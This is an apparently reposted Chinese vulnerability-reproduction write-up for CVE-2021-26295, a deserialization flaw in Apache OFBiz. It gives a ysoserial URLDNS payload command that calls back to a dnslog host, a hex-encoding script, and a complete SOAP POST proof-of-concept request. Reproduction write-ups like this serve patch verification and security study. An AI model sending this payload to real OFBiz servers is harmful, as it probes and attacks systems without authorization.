碼上歡樂
相關內容    簡體    繁體

Apache OFBiz 反序列化漏洞(CVE-2021-26295 )復現

本文轉載自   查看原文   2021-04-04 00:20   260    漏洞復現

0x01影響范圍

Apache OFBiz < 17.12.06

0x02漏洞復現步驟

ysoserial生成URLDNS利用鏈

java -jar ysoserial.jar URLDNS http://***.dnslog.cn > dns.ot

Encode得到的dns.ot

encode腳本

import binascii

filename = 'dns.ot'
with open(filename, 'rb') as f:
    content = f.read()
print(binascii.hexlify(content))

打POC

POC

POST /webtools/control/SOAPService HTTP/1.1
Host: IP:PORT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Content-Length: 1010
Accept: */*
Content-Type: application/xml
Origin: chrome-extension://ieoejemkppmjcdfbnfphhpbfmallhfnc
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/>
<soapenv:Body>
<ser>
    <map-HashMap>
        <map-Entry>
            <map-Key>
                <cus-obj>(ot文件解碼出來的字符串)</cus-obj>
            </map-Key>
            <map-Value>
                <std-String value="(DNSlog地址)"/>
            </map-Value>
        </map-Entry>
    </map-HashMap>
</ser>
</soapenv:Body>
</soapenv:Envelope>

DNSLOG回顯


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 Apache OFBiz rmi反序列化(CVE-2021-26295)復現 漏洞復現 - Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437) CVE-2019-17564:Apache Dubbo反序列化漏洞復現 【CVE-2020-1948】Apache Dubbo Provider反序列化漏洞復現 6.JBoss5.x6.x 反序列化漏洞(CVE-2017-12149)復現 PHP反序列化漏洞-CVE-2016-7124(繞過__wakeup)復現 Weblogic 'wls-wsat' XMLDecoder 反序列化_CVE-2017-10271漏洞復現 jboss CVE-2015-7501 反序列化漏洞復現 【復現】Weblogic XMLDecoder反序列化漏洞(CVE-2017-10271) Apache shiro 反序列化漏洞復現(反彈 shell)
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM